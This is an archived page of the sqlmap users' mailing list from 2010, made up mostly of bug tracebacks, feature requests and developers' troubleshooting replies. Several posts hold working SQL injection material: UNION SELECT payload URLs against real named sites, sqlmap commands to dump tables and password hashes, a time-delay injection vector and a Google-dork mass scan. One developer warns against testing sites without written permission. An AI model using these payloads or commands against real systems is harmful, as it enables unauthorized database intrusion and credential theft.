sqlmap-users Mailing List for sqlmap (Page 132)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: <Bri...@gm...> - 2010-02-15 22:41:48
|
Hello, I tried to dump some infos from Tables using the optional options --start and --stop, but it always gives me out the first entry till the last of the Table and not as specified starting from the 2nd till the 4th. The valnerable site is using MySQL >= 5.0.0 so there shouldnt be a problem with using information_schema. ...\sqlmap-0.7_exe\sqlmap.exe" -u "http://www.xxxxx.php?userid=x" --dump -T TABLES -D information_schema --start 2 --stop 4 I tried it also with other options like this one: ...\sqlmap-0.7_exe\sqlmap.exe" -u "http://www.xxxxx.php?userid=x" --tables -D information_schema --start 2 --stop 4 or with the syntax from the pdf README: --start= --stop= ...\sqlmap-0.7_exe\sqlmap.exe" -u "http://www.xxxxx.php?userid=x" --dump -T TABLES -D information_schema --start=2 --stop=4 or this one: sqlmap-0.7_exe\sqlmap.exe" -u http://www.xxxxx.php?userid=x --dump -T TAB LE_NAME --start=58 --stop=98 [00:52:38] [INFO] fetching number of columns for table 'TABLE_NAME' on database'xxx' [00:52:38] [INFO] retrieved: 0 [00:52:55] [ERROR] unable to retrieve the number of columns for table 'TABLE_NAME' on database 'xxx' Nothing worked i tried also when I only used --start and no --stop, I would be really glad if you can help me. Another question I have is about the option --passwords for example it gives me this error message: when i tried the option --passwords together with -U option. "[ERROR] unable to retrieve the password hashes for the database users" Why does the program tries to dump it from the database "users", I never speciefied it to search on this database, does the program use it as standard DBS for the --password option and can I change it? I would really appreciate to get any help on these questions. -- NEU: Mit GMX DSL über 1000,- ¿ sparen! http://portal.gmx.net/de/go/dsl02 |
|
From: Mauricio V. <mau...@gm...> - 2010-02-12 16:12:01
|
Hey, Yo should also paste sqlmap's output here. I've had the same problem and found out that sometimes the id you pass to sqlmap is important and you can avoid this problem by playing with that parameter. regards, Mauricio 2010/2/12 Bernardo Damele A. G. <ber...@gm...> > Hi, > > On Fri, Feb 12, 2010 at 14:31, <rez...@se...> wrote: > > ... > > > http://www.osa.cz/page4.php?t=-1%20UNION%20ALL%20SELECT%201,2,3,4,version%28%29,6,7,8,9 > > > > So a run these two command: > > > > $ sqlmap.py -u "http://www.XXX.ZZZ.YYY/noticias_show.php?id=2868" > > --union-test > > > > and > > > > $ sqlmap.py -u "http://www.XXX.ZZZ/page4.php?t=129" --union-test > > > > In the first case, sqlmap correctly tells mi that site is vulnerable to > > union sql injection. That's good. But in the second case sqlmap tells, > > that site isn't vulnerable to that kind of sql injection in spite of it > > is (see the link above). These two scenerios looks to me very similar, > > so my question is, where is the problem and why sqlmap can't find union > > sql injection in the second case. Thank you. > > First of all, do NOT post real sites in the mailing list and I > recommend you not hack random sites without written permission. > I see from your example that you provide digits from 1 to test for > UNION query SQL injection; sqlmap uses NULLs, maybe some field in the > original SELECT statement can't be NULL. The detection of UNION along > all the rest of SQL injection techniques will be totally re-engineered > after 0.8 stable release so we will cover also this type of detection. > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: 0x05F5A30F > > > ------------------------------------------------------------------------------ > SOLARIS 10 is the OS for Data Centers - provides features such as DTrace, > Predictive Self Healing and Award Winning ZFS. Get Solaris 10 NOW > http://p.sf.net/sfu/solaris-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
|
From: Bernardo D. A. G. <ber...@gm...> - 2010-02-12 14:39:48
|
Hi, On Fri, Feb 12, 2010 at 14:31, <rez...@se...> wrote: > ... > http://www.osa.cz/page4.php?t=-1%20UNION%20ALL%20SELECT%201,2,3,4,version%28%29,6,7,8,9 > > So a run these two command: > > $ sqlmap.py -u "http://www.XXX.ZZZ.YYY/noticias_show.php?id=2868" > --union-test > > and > > $ sqlmap.py -u "http://www.XXX.ZZZ/page4.php?t=129" --union-test > > In the first case, sqlmap correctly tells mi that site is vulnerable to > union sql injection. That's good. But in the second case sqlmap tells, > that site isn't vulnerable to that kind of sql injection in spite of it > is (see the link above). These two scenerios looks to me very similar, > so my question is, where is the problem and why sqlmap can't find union > sql injection in the second case. Thank you. First of all, do NOT post real sites in the mailing list and I recommend you not hack random sites without written permission. I see from your example that you provide digits from 1 to test for UNION query SQL injection; sqlmap uses NULLs, maybe some field in the original SELECT statement can't be NULL. The detection of UNION along all the rest of SQL injection techniques will be totally re-engineered after 0.8 stable release so we will cover also this type of detection. -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: <rez...@se...> - 2010-02-12 14:31:19
|
Hello, I've just tested sqlmap 0.7 with --union-test option and I have a question. There are two sites vuln. to SQL Injection with UNION statement: http://www.hotlink.com.br/noticias_show.php?id=-1%20union%20all%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,%2020,21,22,23,24-- and http://www.osa.cz/page4.php?t=-1%20UNION%20ALL%20SELECT%201,2,3,4,version%28%29,6,7,8,9 So a run these two command: $ sqlmap.py -u "http://www.hotlink.com.br/noticias_show.php?id=2868" --union-test and $ sqlmap.py -u "http://www.osa.cz/page4.php?t=129" --union-test In the first case, sqlmap correctly tells mi that site is vulnerable to union sql injection. That's good. But in the second case sqlmap tells, that site isn't vulnerable to that kind of sql injection in spite of it is (see the link above). These two scenerios looks to me very similar, so my question is, where is the problem and why sqlmap can't find union sql injection in the second case. Thank you. |
|
From: Patrick W. <pa...@au...> - 2010-02-12 09:40:24
|
Perhaps, but not for a long time I'd say. In the mean time, http://www.insomniasec.com/publications/Access-Through-Access.pdf -Patrick On Fri, Feb 12, 2010 at 7:54 AM, Leet Codes <lee...@gm...> wrote: > I was wondering if support for MS Access DBMS support would be implemented > in later versions of SQLMap? > I received the following message when testing against a vulnerable > application running adobe coldfusion. > > "[ERROR] sqlmap was not able to fingerprint the back-end database management > system, but from the HTML error page it was possible to determinate that the > back-end DBMS is Microsoft Access. > Support for this DBMS will be implemented if you ask, just drop us an > email." > > Here is the error message for ms access db, > [Macromedia][SequeLink JDBC Driver][ODBC Socket][Microsoft][ODBC Microsoft > Access Driver] Syntax error (missing operator) in query expression > 'TEST_TEST.ID' > > Thank you in advanced! SQLMap rocks! > > ------------------------------------------------------------------------------ > SOLARIS 10 is the OS for Data Centers - provides features such as DTrace, > Predictive Self Healing and Award Winning ZFS. Get Solaris 10 NOW > http://p.sf.net/sfu/solaris-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: Miroslav S. <mir...@gm...> - 2010-02-12 09:16:40
|
On 11.2.2010 21:54, Leet Codes wrote: > I was wondering if support for MS Access DBMS support would be > implemented in later versions of SQLMap? > I received the following message when testing against a vulnerable > application running adobe coldfusion. Hi. We are currently working on a support for MS Access, but on a separate branch not available for download. When we'll see that it's ready for production phase we'll inform you. Expect it in rc/beta/stable version(s) of v0.9. Kind regards, Miroslav Stampar > > "[ERROR] sqlmap was not able to fingerprint the back-end database > management system, but from the HTML error page it was possible to > determinate that the back-end DBMS is Microsoft Access. > Support for this DBMS will be implemented if you ask, just drop us an > email." > > Here is the error message for ms access db, > [Macromedia][SequeLink JDBC Driver][ODBC Socket][Microsoft][ODBC > Microsoft Access Driver] Syntax error (missing operator) in query > expression 'TEST_TEST.ID <http://TEST_TEST.ID>' > > Thank you in advanced! SQLMap rocks! > > > ------------------------------------------------------------------------------ > SOLARIS 10 is the OS for Data Centers - provides features such as DTrace, > Predictive Self Healing and Award Winning ZFS. Get Solaris 10 NOW > http://p.sf.net/sfu/solaris-dev2dev > > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B |
|
From: Leet C. <lee...@gm...> - 2010-02-11 20:54:16
|
I was wondering if support for MS Access DBMS support would be implemented in later versions of SQLMap? I received the following message when testing against a vulnerable application running adobe coldfusion. "[ERROR] sqlmap was not able to fingerprint the back-end database management system, but from the HTML error page it was possible to determinate that the back-end DBMS is Microsoft Access. Support for this DBMS will be implemented if you ask, just drop us an email." Here is the error message for ms access db, [Macromedia][SequeLink JDBC Driver][ODBC Socket][Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression ' TEST_TEST.ID' Thank you in advanced! SQLMap rocks! |
|
From: Sam E. <dr...@bu...> - 2010-02-10 22:59:43
|
I have manually confirmed a simple 'waitfor%20delay'0:0:20'- sql injection vector in a site test, but when I try to replicate this with SQLMap using the '--time-test' option it does not even perform any 'wait for delay' type vectors as shown in the usage options. I set the verbosity to v3 and looking at the logs only the standard injection methods are tried, even though I specify the time test option and I know that it is a valid injection vector. I have tried this many times on different sites to no avail. Am I missing something? Sam. |
|
From: Miroslav S. <mir...@gm...> - 2010-02-10 12:08:41
|
Hi. sqlmap is now updated to handle those kind of "mistakes" in a "friendly manner". Please update to the latest development version to use it ( svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap/ ). Kind regards, Miroslav Stampar On Wed, Feb 10, 2010 at 11:11 AM, Patrick Webster <pa...@au...> wrote: > sqlmap should probably handle this (port is a string) in a friendly manner :) > > On Wed, Feb 10, 2010 at 7:43 AM, Bernardo Damele A. G. > <ber...@gm...> wrote: >> Your mistake, look at the host you provided.. two 'http://'. >> >> Bernardo > > ------------------------------------------------------------------------------ > SOLARIS 10 is the OS for Data Centers - provides features such as DTrace, > Predictive Self Healing and Award Winning ZFS. Get Solaris 10 NOW > http://p.sf.net/sfu/solaris-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B |
|
From: Patrick W. <pa...@au...> - 2010-02-10 11:15:51
|
sqlmap should probably handle this (port is a string) in a friendly manner :) On Wed, Feb 10, 2010 at 7:43 AM, Bernardo Damele A. G. <ber...@gm...> wrote: > Your mistake, look at the host you provided.. two 'http://'. > > Bernardo |
|
From: Miroslav S. <mir...@gm...> - 2010-02-10 09:33:08
|
Hi. Thank you for your report. This problem is probably related to the connection issue(s) you may experience on your side testing that site. We've made some patches regarding this and other similar cases with proper error reporting in current development version ( svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap/ ). Kind regards, Miroslav Stampar On Tue, Feb 9, 2010 at 7:13 PM, Dani <lg...@gm...> wrote: > dani@modesty:/usr/share/sqlmap$ yes "y" | sqlmap -g "inurl:index.php?id" > sqlmap version: 0.7 > Python version: 2.6.4 > Operating system: linux2 > Traceback (most recent call last): > File "/usr/bin/sqlmap", line 84, in main > start() > File "/usr/share/sqlmap/lib/controller/controller.py", line 178, in start > checkStability() > File "/usr/share/sqlmap/lib/controller/checks.py", line 304, in > checkStability > conf.md5hash = md5hash(firstPage) > File "/usr/share/sqlmap/lib/core/convert.py", line 54, in md5hash > return md5.new(string).hexdigest() > TypeError: md5() argument 1 must be string or read-only buffer, not None > > -- > Saludos > *********************************************** > Daniel G. Gamonal > Sistemas de Informacion > *********************************************** > > ------------------------------------------------------------------------------ > SOLARIS 10 is the OS for Data Centers - provides features such as DTrace, > Predictive Self Healing and Award Winning ZFS. Get Solaris 10 NOW > http://p.sf.net/sfu/solaris-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B |
|
From: Bernardo D. A. G. <ber...@gm...> - 2010-02-09 20:44:08
|
Your mistake, look at the host you provided.. two 'http://'. Bernardo On Tue, Feb 9, 2010 at 19:43, Otavio Augusto <ota...@gm...> wrote: > ./sqlmap.py -u "http://http://ww2.site/index.asp" --method POST --data > "txtUserName=a" > > sqlmap/0.8-rc6 > by Bernardo Damele A. G. <ber...@gm...> > > [*] starting at: 16:42:31 > > [16:42:31] [ERROR] unhandled exception in sqlmap/0.8-rc6, please copy the > command line and the following text and send by e-mail to > sql...@li.... The developer will fix it as soon as > possible: > sqlmap version: 0.8-rc6 > Python version: 2.5.2 > Operating system: linux2 > Traceback (most recent call last): > File "./sqlmap.py", line 77, in main > init(cmdLineOptions) > File "/down/downloads/secur/sqlmap-0.8/lib/core/option.py", line 1113, in > init > parseTargetUrl() > File "/down/downloads/secur/sqlmap-0.8/lib/core/common.py", line 598, in > parseTargetUrl > conf.port = int(__hostnamePort[1]) > ValueError: invalid literal for int() with base 10: '' > > [*] shutting down at: 16:42:31 > > > My mistake or maybe a bug? > > Thank You > > ------------------------------------------------------------------------------ > SOLARIS 10 is the OS for Data Centers - provides features such as DTrace, > Predictive Self Healing and Award Winning ZFS. Get Solaris 10 NOW > http://p.sf.net/sfu/solaris-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: Otavio A. <ota...@gm...> - 2010-02-09 19:44:23
|
./sqlmap.py -u "http://http://ww2.site/index.asp" --method POST --data
"txtUserName=a"
sqlmap/0.8-rc6
by Bernardo Damele A. G. <ber...@gm...>
[*] starting at: 16:42:31
[16:42:31] [ERROR] unhandled exception in sqlmap/0.8-rc6, please copy the
command line and the following text and send by e-mail to
sql...@li.... The developer will fix it as soon as
possible:
sqlmap version: 0.8-rc6
Python version: 2.5.2
Operating system: linux2
Traceback (most recent call last):
File "./sqlmap.py", line 77, in main
init(cmdLineOptions)
File "/down/downloads/secur/sqlmap-0.8/lib/core/option.py", line 1113, in
init
parseTargetUrl()
File "/down/downloads/secur/sqlmap-0.8/lib/core/common.py", line 598, in
parseTargetUrl
conf.port = int(__hostnamePort[1])
ValueError: invalid literal for int() with base 10: ''
[*] shutting down at: 16:42:31
My mistake or maybe a bug?
Thank You
|
|
From: Dani <lg...@gm...> - 2010-02-09 18:13:03
|
dani@modesty:/usr/share/sqlmap$ yes "y" | sqlmap -g "inurl:index.php?id"
sqlmap version: 0.7
Python version: 2.6.4
Operating system: linux2
Traceback (most recent call last):
File "/usr/bin/sqlmap", line 84, in main
start()
File "/usr/share/sqlmap/lib/controller/controller.py", line 178, in start
checkStability()
File "/usr/share/sqlmap/lib/controller/checks.py", line 304, in
checkStability
conf.md5hash = md5hash(firstPage)
File "/usr/share/sqlmap/lib/core/convert.py", line 54, in md5hash
return md5.new(string).hexdigest()
TypeError: md5() argument 1 must be string or read-only buffer, not None
--
Saludos
***********************************************
Daniel G. Gamonal
Sistemas de Informacion
***********************************************
|
|
From: Miroslav S. <mir...@gm...> - 2010-02-09 11:30:51
|
Hi. Thank you for your report. This should be fixed in the latest development version (just try to update). Kind regards. On Tue, Feb 9, 2010 at 11:47 AM, <ds...@ds...> wrote: > > [12:45:03] [ERROR] unhandled exception in sqlmap/0.8-rc6, please copy the > > comman > > d line and the following text and send by e-mail to > > sql...@li...urcefor > > ge.net. The developer will fix it as soon as possible: > > sqlmap version: 0.8-rc6 > > Python version: 2.6.4 > > Operating system: win32 > > Traceback (most recent call last): > > File > > "F:\CREED\sqlmap-0.6.4\output\www.e-port.ru\80-e\123\sqlmap\sqlmap.py", l > > ine 80, in main > > start() > > File > > "F:\CREED\sqlmap-0.6.4\output\www.e-port.ru\80-e\123\sqlmap\lib\controlle > > r\controller.py", line 257, in start > > action() > > File > > "F:\CREED\sqlmap-0.6.4\output\www.e-port.ru\80-e\123\sqlmap\lib\controlle > > r\action.py", line 138, in action > > conf.dbmsHandler.osCmd() > > File > > "F:\CREED\sqlmap-0.6.4\output\www.e-port.ru\80-e\123\sqlmap\plugins\gener > > ic\takeover.py", line 84, in osCmd > > stackedTest() > > File > > "F:\CREED\sqlmap-0.6.4\output\www.e-port.ru\80-e\123\sqlmap\lib\technique > > s\outband\stacked.py", line 42, in stackedTest > > query = getDelayQuery() > > File > > "F:\CREED\sqlmap-0.6.4\output\www.e-port.ru\80-e\123\sqlmap\lib\core\comm > > on.py", line 723, in getDelayQuery > > query = queries[kb.dbms].timedelay2 % conf.timeSec > > TypeError: not all arguments converted during string formatting > > > > [*] shutting down at: 12:45:03 > > ------------------------------------------------------------------------------ > The Planet: dedicated and managed hosting, cloud storage, colocation > Stay online with enterprise data centers and the best network in the business > Choose flexible plans and management services without long-term contracts > Personal 24x7 support from experience hosting pros just a phone call away. > http://p.sf.net/sfu/theplanet-com > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B |
|
From: <ds...@ds...> - 2010-02-09 11:14:29
|
[12:45:03] [ERROR] unhandled exception in sqlmap/0.8-rc6, please copy the comman d line and the following text and send by e-mail to sql...@li...urcefor ge.net. The developer will fix it as soon as possible: sqlmap version: 0.8-rc6 Python version: 2.6.4 Operating system: win32 Traceback (most recent call last): File "F:\CREED\sqlmap-0.6.4\output\www.e-port.ru\80-e\123\sqlmap\sqlmap.py", l ine 80, in main start() File "F:\CREED\sqlmap-0.6.4\output\www.e-port.ru\80-e\123\sqlmap\lib\controlle r\controller.py", line 257, in start action() File "F:\CREED\sqlmap-0.6.4\output\www.e-port.ru\80-e\123\sqlmap\lib\controlle r\action.py", line 138, in action conf.dbmsHandler.osCmd() File "F:\CREED\sqlmap-0.6.4\output\www.e-port.ru\80-e\123\sqlmap\plugins\gener ic\takeover.py", line 84, in osCmd stackedTest() File "F:\CREED\sqlmap-0.6.4\output\www.e-port.ru\80-e\123\sqlmap\lib\technique s\outband\stacked.py", line 42, in stackedTest query = getDelayQuery() File "F:\CREED\sqlmap-0.6.4\output\www.e-port.ru\80-e\123\sqlmap\lib\core\comm on.py", line 723, in getDelayQuery query = queries[kb.dbms].timedelay2 % conf.timeSec TypeError: not all arguments converted during string formatting [*] shutting down at: 12:45:03 |
|
From: Miroslav S. <mir...@gm...> - 2010-02-06 19:24:11
|
Hi. Thank you for the report. This issue should be fixed in the current development version. Please get the latest version by checking it out from the repository ( svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap/ ). Kind regards, Miroslav Stampar On 6.2.2010 19:57, David Alvarez wrote: > Hello, > I was executing: > > /david@Xlaptop:~$ sqlmap -u > "http://domain/app/section/section1.php?parameter=1010" -b/ > > > sqlmap version: 0.7 > Python version: 2.6.2 > Operating system: linux2 > Traceback (most recent call last): > File "/usr/bin/sqlmap", line 84, in main > start() > File "/usr/share/sqlmap/lib/controller/controller.py", line 263, in > start > action() > File "/usr/share/sqlmap/lib/controller/action.py", line 49, in action > conf.dbmsHandler = setHandler() > File "/usr/share/sqlmap/lib/controller/handler.py", line 67, in > setHandler > if dbmsHandler.checkDbms(): > File "/usr/share/sqlmap/plugins/dbms/postgresql.py", line 203, in > checkDbms > self.getBanner() > File "/usr/share/sqlmap/plugins/generic/enumeration.py", line 130, > in getBanner > setOs() > File "/usr/share/sqlmap/lib/core/session.py", line 191, in setOs > infoMsg += " Service Pack %d" % kb.osSP > TypeError: %d format: a number is required, not NoneType > > > ------------------------------------------------------------------------------ > The Planet: dedicated and managed hosting, cloud storage, colocation > Stay online with enterprise data centers and the best network in the business > Choose flexible plans and management services without long-term contracts > Personal 24x7 support from experience hosting pros just a phone call away. > http://p.sf.net/sfu/theplanet-com > > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B |
|
From: David A. <dav...@gm...> - 2010-02-06 18:57:39
|
Hello,
I was executing:
*david@Xlaptop:~$ sqlmap -u "
http://domain/app/section/section1.php?parameter=1010" -b*
sqlmap version: 0.7
Python version: 2.6.2
Operating system: linux2
Traceback (most recent call last):
File "/usr/bin/sqlmap", line 84, in main
start()
File "/usr/share/sqlmap/lib/controller/controller.py", line 263, in start
action()
File "/usr/share/sqlmap/lib/controller/action.py", line 49, in action
conf.dbmsHandler = setHandler()
File "/usr/share/sqlmap/lib/controller/handler.py", line 67, in setHandler
if dbmsHandler.checkDbms():
File "/usr/share/sqlmap/plugins/dbms/postgresql.py", line 203, in
checkDbms
self.getBanner()
File "/usr/share/sqlmap/plugins/generic/enumeration.py", line 130, in
getBanner
setOs()
File "/usr/share/sqlmap/lib/core/session.py", line 191, in setOs
infoMsg += " Service Pack %d" % kb.osSP
TypeError: %d format: a number is required, not NoneType
|
|
From: Bernardo D. A. G. <ber...@gm...> - 2010-01-31 10:27:35
|
svn checkout a new working copy will solve the problem. On Sun, Jan 31, 2010 at 09:53, Roberto Castrogiovanni <cas...@gm...> wrote: > Hi, > i have a problem while "svn updating" my sqlmap version. It every times > prompt me for a password: > > mordor:/sqlmap# svn update > Saltato 'xml/banner/mssql.xml' > Reame di autenticazione: <https://svn.sqlmap.org:443> Authentication > required > Password per 'root': > > May you please help me ? > > Thank you in advance > > Roberto > -- > Computers are like air-conditioners: > they stop working properly > when you open Windows > > > > ------------------------------------------------------------------------------ > The Planet: dedicated and managed hosting, cloud storage, colocation > Stay online with enterprise data centers and the best network in the > business > Choose flexible plans and management services without long-term contracts > Personal 24x7 support from experience hosting pros just a phone call away. > http://p.sf.net/sfu/theplanet-com > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: Roberto C. <cas...@gm...> - 2010-01-31 09:53:19
|
Hi, i have a problem while "svn updating" my sqlmap version. It every times prompt me for a password: mordor:/sqlmap# svn update Saltato 'xml/banner/mssql.xml' Reame di autenticazione: <https://svn.sqlmap.org:443> Authentication required Password per 'root': May you please help me ? Thank you in advance Roberto -- Computers are like air-conditioners: they stop working properly when you open Windows |
|
From: Bernardo f. twice! <ber...@gm...> - 2010-01-25 10:35:11
|
Use sqlmap from subversion repository, it has been fixed there. Bernardo On Wed, Jan 20, 2010 at 12:54, Reddy Hack xp <red...@ya...> wrote: > sqlmap version: 0.7 > Python version: 2.6.1 > Operating system: win32 > Traceback (most recent call last): > File "sqlmap.py", line 84, in main > File "lib\controller\controller.pyc", line 263, in start > File "lib\controller\action.pyc", line 140, in action > File "plugins\generic\takeover.pyc", line 295, in osShell > File "plugins\generic\takeover.pyc", line 187, in __webBackdoorInit > File "lib\request\connect.pyc", line 131, in getPage > File "urllib2.pyc", line 124, in urlopen > File "urllib2.pyc", line 383, in open > File "urllib2.pyc", line 401, in _open > File "urllib2.pyc", line 361, in _call_chain > File "urllib2.pyc", line 1130, in http_open > File "urllib2.pyc", line 1087, in do_open > File "httplib.pyc", line 656, in __init__ > File "httplib.pyc", line 668, in _set_hostport > InvalidURL: nonnumeric port: '80\home\feldgrau' > > [*] shutting down at: 18:06:42 > > > C:\ll> > > > The INTERNET now has a personality. YOURS! See your Yahoo! Homepage. http://in.yahoo.com/ > > > ------------------------------------------------------------------------------ > Throughout its 18-year history, RSA Conference consistently attracts the > world's best and brightest in the field, creating opportunities for Conference > attendees to learn about information security's most important issues through > interactions with peers, luminaries and emerging and established companies. > http://p.sf.net/sfu/rsaconf-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: Bernardo D. A. G. <ber...@gm...> - 2010-01-22 18:18:31
|
On Fri, Jan 22, 2010 at 08:34, Beatriz Duran <bea...@ya...> wrote: > ... > http://X.X.X.X/uoc/alumnos/sqlinjection/?departamento=0%20UNION%20ALL%20SELECT%20NULL,%20%271234%27 > > It works, the number 1234 is shown as part of a list; is there a way to > force sqlmap to work with UNION and avoid the testing that --use-union does? Not yet. Test for UNION query SQL injection and detection phase in general will be totally rewritten in the next months though. -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: Beatriz D. <bea...@ya...> - 2010-01-22 08:34:38
|
Ok, got it; now that takes me to another issue; sqlmap says that the target doesn't work with UNION: [02:24:17] [WARNING] the target url is not affected by an exploitable full inband sql injection vulnerability [02:24:17] [INFO] confirming partial (single entry) inband sql injection on parameter 'departamento' by appending a false condition after the parameter value [02:24:18] [TRAFFIC OUT] HTTP request: GET /uoc/alumnos/sqlinjection/?departamento=0%20AND%203320=3321%20UNION%20ALL%20SELECT%20NULL%23%20AND%203353=3353 HTTP/1.1 But if I apply directly: http://X.X.X.X/uoc/alumnos/sqlinjection/?departamento=0%20UNION%20ALL%20SELECT%20NULL,%20%271234%27 It works, the number 1234 is shown as part of a list; is there a way to force sqlmap to work with UNION and avoid the testing that --use-union does? I Have Learned So much from God That I can no longer Call Myself A Christian, a Hindu, a Muslim A Buddhist, a Jew. The Truth has shared so much of Itself With me That I can no longer call myself A man, a woman, and angel Or even pure Soul. Love has Befriended Hafiz so completely It has turned to ash And freed Me Of every concept and image My mind has ever known. –Hafiz, Persian poet (1315 – 1390) ________________________________ From: Ignacio Hernández <nac...@gm...> To: Beatriz Duran <bea...@ya...> Sent: Thu, January 21, 2010 8:41:14 AM Subject: Re: [sqlmap-users] Fw: Which get was the right ok, that's because is a blind sql injection. you can google it to find more info about it but the bassic is tha in blind sqli you try to figure out the result of vthe query char by char. for example if the user is root, you have to first find r, then o... This is like this because in blind sql injections the database only answers "True" or "False". so you ask the database: is the first char bigger than "a"? Then it answers yea... and so on. Thats why there are so many querys, all of them needed to guess the content of the query. El 21/01/2010 7:37, "Beatriz Duran" <bea...@ya...> escribió: > > >>For example, you run: > >sqlmap -u http://XXX.XXX.XXX.XXX/something/?departamento=0 -v 5 --sql-query "SELECT CURRENT_USER()" > >After the execution you find the current user: > >[00:11:15] [INFO] retrieved: usqli@localhost >[00:11:15] [DEBUG] performed 112 queries in 87 seconds >SELECT CURRENT_USER(): 'usqli@localhost' > >>But the results say that 112 queries were tried, like: > >something/?departamento=0%20AND%20ORD%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%2810000%29%29%2C%20CHAR%2832%29%29%29%2C%2016%2C%201%29%29%20%3E%201%20AND%20316=316 HTTP/1.1 > >How can I know which one of the 112 got the result? > > > > > > >> > > >> >> ________________________________ > >From:Ignacio >Hernández [mailto:nac...@gm...] >Sent: Miércoles, 20 de Enero de >2010 06:10 p.m. >To: Duran, Beatriz >Subject: Re: [sqlmap-users] 